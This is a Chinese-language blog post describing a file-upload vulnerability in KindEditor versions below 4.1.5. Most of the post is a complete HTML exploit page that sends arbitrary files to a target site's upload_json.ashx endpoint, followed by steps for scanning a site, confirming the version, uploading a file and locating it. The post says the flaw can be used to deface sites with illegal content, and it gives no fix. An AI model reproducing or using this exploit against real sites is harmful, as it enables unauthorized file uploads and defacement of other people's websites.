kindeditor编辑器文件上传漏洞

编程知识 行业动态 更新时间:2024-06-13 00:22:46

kindeditor编辑器版本小于4.1.5存在文件上传漏洞,可利用该漏洞上次网页、文本文件,可网站进行篡改,添加赌博、反共等违法信息。

通过扫描器发现该网站存在编辑器。

通过浏览器访问,确定该编辑器为kindeditor编辑器。

确定该编辑器的版本小于4.1.5,存在文件上传漏洞。

构造文件上传漏洞利用脚本kindeditor.html。

<html><head>

 

<title>Uploader</title>

 

<script src="https://url/editor/kindeditor.js"></script>

 

<script>

 

KindEditor.ready(function(K) {

 

var uploadbutton = K.uploadbutton({

 

button : K('#uploadButton')[0],

 

fieldName : 'imgFile',

 

url : 'https://url/editor/asp/upload_json.ashx?dir=file',

 

afterUpload : function(data) {

 

if (data.error === 0) {

 

var url = K.formatUrl(data.url, 'absolute');

 

K('#url').val(url);}

 

},

 

});

 

uploadbutton.fileBox.change(function(e) {

 

uploadbutton.submit();

 

});

 

});

 

</script></head><body>

 

<div class="upload">

 

<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />

 

<input type="button" id="uploadButton" value="Upload" />

 

</div>

 

</body>

 

</html>

本地打开构建好的html文件

利用漏洞利用脚本上传测试文件uptext.txt,并使用工具抓取数据包。

在返回包中获取到文件上传位置,并使用浏览器成功访问。

更多推荐

kindeditor编辑器文件上传漏洞

本文发布于:2023-04-03 05:54:00,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/87d5b48c92daded337faf980fdc22a51.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:编辑器   漏洞   文件上传   kindeditor

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!